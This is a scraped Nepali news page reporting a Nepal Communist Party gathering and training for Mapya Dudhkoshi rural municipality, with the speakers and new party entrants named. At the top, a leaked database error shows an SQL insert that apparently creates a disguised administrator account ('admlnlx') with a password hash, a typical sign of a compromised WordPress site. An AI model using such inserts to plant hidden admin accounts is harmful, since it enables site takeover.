WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BjSFVtpLic0q9izVK6WXF/X9UBGLGb1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 13:47:25', '', 'admlnlx', 'admlnlx')

माप्य दुधकोशी गाउँपालिका स्तरिय नेकपा बृहत भेला तथा प्रशिक्षण कार्यक्रम सम्पन्न – Gaule Khabar

माप्य दुधकोशी गाउँपालिका स्तरिय नेकपा बृहत भेला तथा प्रशिक्षण कार्यक्रम सम्पन्न

माप्य दुधकोशी गाउँपालिका स्तरिय नेकपा बृहत भेला तथा प्रशिक्षण कार्यक्रम सम्पन्न

गाउँले न्युज, काठमाण्डौ । सोलुखुम्बु जिल्ला माप्य दुधकोशी गाउँपालिका स्तरिय नेपाल कम्युनिस्ट पार्टीको बृहत भेला तथा प्रशिक्षण कार्यक्रम सम्पन्न भएको छ । नेपाल कम्म्युनिष्ट पार्टी माप्य दुधकोशी गाउँपालिका कमिटीलेको आयोजनामा काठमाडौं सुकेधारा स्थित नवदुर्गा पार्टी प्यालेसमा कार्यक्रम सम्पन्न भएको हो ।

नेपाल कम्युनिस्ट पार्टी स्थायी कमिटी सदस्य एबम संगठन बिभागका उपप्रमुख जनार्दन शर्माको प्रमुख अतिथी प्रदेश नम्बर एकका पार्टी कमिटी अध्यक्ष देबराज घिमिरेको बिशिस्ट अतिथी तथा संघिया संसद हेमकुमार राई “सुरबिर”को बिशेष अतिथीमा आयोजित उक्त कार्यक्रममा सोलुखुम्बुका कम्युनिस्ट नेता तथा कार्यकर्ताको उपस्थिती रहेको थियो ।

सरकारको योजनालाई गाउसम्म पुर्‍याउन र गाउका समस्यालाई केन्द्रसम्म पुर्‍याउनका लागि यो कार्यक्रम आयोजना गरिएको माप्य दुधकोशी गाउँपालिका नेकपा अध्यक्ष गौरब राईले बताए ।

कार्यक्रममा संघिय सांसद हेम कुमार राई “सुरबिर”, प्रदेश सांसदद्वय उत्तम कुमार बस्नेत र बुद्धिकुमार राजभण्डारी, माप्य दुधकोशी गाउपालिकाका अध्यक्ष बुद्धिकिरण राई, नेकपा सोलुखुम्बुका जिल्ला अध्यक्ष मानबिर राई, सचिब गोन्बु शेर्पा “कर्ज्याङ”ले आफ्नो मन्तब्य राखेका थिए । मन्तब्यका क्रममा बक्ताहरुले सोलुखुम्बुमा संगठन सुधारको बर्तमान स्थिति, निर्वाचित निकायले गरिरहेको कार्यप्रगती र आगामी रणनितिको बारेमा आफ्नो धारणा राखेका थिए ।

प्रशिक्षण कार्यक्रमकै क्रममा विभिन्न पार्टी परित्याग गरी एक दर्जन भन्दा बढीले नेकपामा प्रवेश गरेका छन् । पुर्ण कुमार खालिङ, रविन खालिङ, सरोज खालिङ, टिकाराम पाख्रिन, खुमराज राई, दीपक राई, पन्चे राई, छविमाया राई, प्रदिप राई, रण बहादुर मगर, महलसिंह राई र पन्च राईले नेकपामा प्रवेश गरेका छन् । पार्टी प्रवेश गरेका नयाँ प्रवेशीलाई प्रमुख अतिथि जनार्दन शर्माले खादा र अबिरले स्वागत गरेका थिए ।

कार्यक्रममा नेपाल कम्युनिस्ट पार्टी प्रदेश नम्बर १ कमिटी अध्यक्ष तथा पार्टीका केन्द्रिय सदस्य देबराज घिमिरे र नेपाल कम्युनिस्ट पार्टीका स्थायी कमिटी सदस्य तथा संगठन बिभागका उपप्रमुख जनार्दन शर्माले उपस्थित नेता तथा कार्यकर्तालाई प्रशिक्षण दिए ।

भेला तथा प्रशिक्षण कार्यक्रममा थुलुङ दुधकोशी गाउँपालिका अध्यक्ष असिम राई, नेचासल्यान गाउँपालिका अध्यक्ष डुफकुमार बास्तोला लगायत नेकपामा आस्था राख्ने पाँचसय भन्दा बढीको सहभागिता रहेको थियो ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका